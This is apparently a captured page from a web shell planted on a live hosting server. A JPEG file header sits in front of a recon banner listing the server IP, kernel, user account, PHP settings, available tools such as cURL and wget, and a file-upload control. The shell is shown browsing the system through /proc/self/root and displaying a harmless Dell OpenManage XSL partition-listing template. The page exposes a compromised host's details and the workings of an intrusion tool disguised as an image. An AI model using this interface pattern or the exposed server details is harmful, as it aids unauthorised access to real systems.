����JFIF��x�x����'
| Server IP : 78.140.185.180 / Your IP : 216.73.216.28 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /proc/self/root/opt/dell/srvadmin/var/lib/openmanage/xslroot/sm/template/cli/ |
Upload File : |
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:fo="http://www.w3.org/1999/XSL/Format">
<xsl:include href="../common/Utils.xsl"/>
<xsl:include href="../common/vdparttbl.xsl"/>
<xsl:include href="../common/encltbl.xsl"/>
<xsl:include href="../en/globals.xsl"/>
<xsl:template match="OMA">
<DataArea>
<!-- Determine which form of the cli was invoked. This determines the page title. -->
<xsl:choose>
<xsl:when test="count(//UserInputError)>0">
<PageTitle>
<xsl:attribute name="display"><xsl:value-of select="$strTitle1"/><xsl:value-of select="//UserInputError"/></xsl:attribute>
</PageTitle>
</xsl:when>
<xsl:otherwise>
<xsl:choose>
<xsl:when test="Partitions/DCStorageObject">
<PageTitle>
<xsl:attribute name="display">List of Partitions</xsl:attribute>
</PageTitle>
<xsl:apply-templates select="Partitions"/>
</xsl:when>
<xsl:otherwise>
<PageTitle>
<xsl:attribute name="display">Partitions Not found</xsl:attribute>
</PageTitle>
</xsl:otherwise>
</xsl:choose>
</xsl:otherwise>
</xsl:choose>
</DataArea>
</xsl:template>
<xsl:template match="Partitions">
<TableData>
<xsl:for-each select="DCStorageObject">
<Header>
<xsl:call-template name="VirtualDiskPartitionTableHeader">
<xsl:with-param name="tasks">false</xsl:with-param>
</xsl:call-template>
</Header>
<xsl:call-template name="VirtualDiskPartitionTableRows">
<xsl:with-param name="tasks">false</xsl:with-param>
</xsl:call-template>
</xsl:for-each>
</TableData>
</xsl:template>
<xsl:template match="OMAUserRights"/>
<xsl:template match="*"/>
</xsl:stylesheet>